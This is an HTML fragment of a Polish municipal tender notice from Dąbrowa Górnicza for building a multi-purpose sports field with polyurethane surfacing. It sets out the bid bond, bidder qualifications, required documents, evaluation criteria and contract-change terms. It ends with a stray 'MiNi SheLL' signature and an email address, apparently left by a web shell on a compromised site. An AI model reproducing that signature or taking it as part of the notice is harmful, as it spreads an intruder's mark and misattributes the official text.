<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 17 000,00 zł (słownie: siedemnaście tysięcy złotych) w formach określonych w art. 45 ust. 6 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, Wykonawca wykonał zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończył roboty budowlane polegające na  budowie lub przebudowie:
-  minimum 3 obiektów sportowych, w tym min. 1 w systemie zaprojektuj i wybuduj, z których każdy składa się z boiska wielofunkcyjnego o pow. min. 1000 m2, wykonanego w technologii nawierzchni natryskowej  z warstwą użytkową  w min. trzech kolorach wraz robotami towarzyszącymi o wartości min. 300.000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:       
- 1 osobą posiadająca uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej, 
- 1 osobą posiadającą  uprawnienia  budowlane  do projektowania w specjalności architektonicznej,
- 1 osobą posiadającą uprawnienia  budowlane  do projektowania w specjalności konstrukcyjno -budowlanej, 
zgodnie  z ustawą z dnia  7 lipca 1994 r. Prawo budowlane (Dz. U z 2016 r. poz. 290 t.j.) lub odpowiadające im ważne uprawnienia budowlane.  

Zamawiający dopuszcza posiadanie przez 1 osobę więcej niż jednego z ww. uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada:
a) środki finansowe w wysokości co najmniej  700 000,00 zł lub zdolność kredytową w wysokości co najmniej 700 000,00 zł,

b) posiada ubezpieczenie od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  700 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy robót budowlanych pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. III.3.2. ogłoszenia.  W wykazie nie należy podawać informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. potwierdzenie wniesienia wadium;
3.pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
4. dowód oddania przez Podmiot niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie  polegać na zasobach Podmiotu - zgodnie z art. 26 ust. 2b Ustawy: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość oferowanego systemu nawierzchni poliuretanowej - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej mowy  w  stosunku do treści  oferty, na podstawie której   dokonano wyboru Wykonawcy, w zakresie:
1.1.zmiany terminu wykonania zamówienia  w następujących przypadkach:
1.1.1. wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, lub inne okoliczności niezależne od Zamawiającego, w tym takie, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie z technologią ich wykonywania, np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
1.2. zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, co powoduje konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia, 
1.2.w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących  okoliczności:
1.2.1.wydłużenia terminu gwarancji w związku z zadeklarowaniem dłuższego terminu gwarancji przez producenta, 
1.2.2. poprawy jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych, dostaw lub zmiana technologii,
1.2.3. aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany obowiązujących przepisów,
1.2.4. zmiany przepisów prawa istotnych dla postanowień zawartej umowy, 
1.2.5. zmiany Kierownika Budowy Wykonawcy na skutek zdarzeń losowych, zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska  z zastrzeżeniem równoważności uprawnień,
1.2.6. zmiany Podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy Podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy Podwykonawca,
1.2.7.  W przypadku zmiany  stawki podatku VAT: 
1.2.7.1.  W przypadku zwiększenia  stawki podatku  VAT:  
Ceny ryczałtowe netto nie mogą być wyższe niż zadeklarowane w ofercie. Wartość wynagrodzenia ryczałtowego brutto nie ulegnie zmianie  w okresie obowiązywania umowy
1.2.7.2. W przypadku zmniejszenia stawki podatku  VAT:  
 Ceny ryczałtowe netto nie mogą być wyższe niż zadeklarowane w ofercie. Wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT.
2.	W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w pkt. 1.1 i 1.2 Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
3.	Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie  strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać  uzasadnienie faktyczne i prawne.
4.	Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej,                           ul. Graniczna 21, Wydział Gospodarki Komunalnej i Mieszkaniowej, III piętro,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2016 godzina 09:30, miejsce: Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Zamówienie nie jest finansowane ze środków Unii Europejskiej. II.	Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny brutto podanej w ofercie.
III. . Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch  lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt.  9.2. SIWZ przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Dokument wymieniony w  pkt. 9.3. SIWZ każdy z Wykonawców składa oddzielnie. 
3.Dokumenty i oświadczenia wymienione w  pkt. 9.1.2 do 9.1.5 SIWZ Wykonawcy składają wspólnie. Oświadczenie wymienione w pkt. 9.1.1. SIWZ, formularz ofertowy wymieniony w pkt. 9.5.1. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. Oświadczenia na podstawie art. 22 ust. 1 Ustawy (załącznik nr 2 do SIWZ) składają  wszyscy wykonawcy wspólnie na jednym druku lub pełnomocnik. W przypadku polisy wymaganej w pkt. 9.1.5. SIWZ Zamawiający dopuszcza także przedstawienie jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie  zamówienia.
4. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
5. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
IV. Uszczegółowienie sekcji III.5 ogłoszenia: W celu potwierdzenia, ze oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda, aby Wykonawca załączył do oferty:
1. atest higieniczny  PZH dla nawierzchni lub dokument równoważny
2. aktualne badania ekologiczne na zgodność z DIN V 18035- 6:2013 wydane przez akredytowane przez IAAF laboratorium, potwierdzające wymagane parametry w zakresie zawartości metali ciężkich 
3. autoryzację producenta nawierzchni  wystawioną w  oryginale  dla wykonawcy na  realizowaną inwestycję  wraz  z  potwierdzeniem gwarancji  udzielonej   przez   producenta  na  tę  nawierzchnię
4. aktualną kompletną aprobatę techniczną ITB lub rekomendację techniczną ITB lub dokument równoważny, potwierdzający wszystkie parametry techniczne oferowanej nawierzchni wymagane przez Zamawiającego
5. aktualny certyfikat IAAF dla oferowanej nawierzchni
6. kartę techniczną nawierzchni potwierdzoną przez producenta systemu
7. próbkę nawierzchni z metryczką producenta
8. dokument potwierdzający spełnianie przez oferowaną nawierzchnię  wymagań normy  PN-EN 14877/2014.  
V. Uszczegółowienie sekcji  IV.2.1. ogłoszenia: Jakość oferowanego systemu nawierzchni poliuretanowej - 20%.   
Oferty z nawierzchnią poliuretanową o parametrach jakościowych spełniających łącznie wszystkie przedstawione poniżej warunki otrzymają 20 pkt.
Określenie parametru, Jednostka, Wartość wymagana:
- odporność na ścieranie wg metody Tabera ( G): 0,4 - 0,56
- odporność nawierzchni  na działanie  butów z kolcami 
w zakresie spadku wytrzymałości na rozciąganie (%)    mniejsza lub równa 3,0
-   przepuszczalność wody (mm/h)  większa lub równa  19 000,0
Jakość oferowanej nawierzchni poliuretanowej będzie analizowana na podstawie dokumentów załączonych do oferty, wymienionych w pkt. 9.4. SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com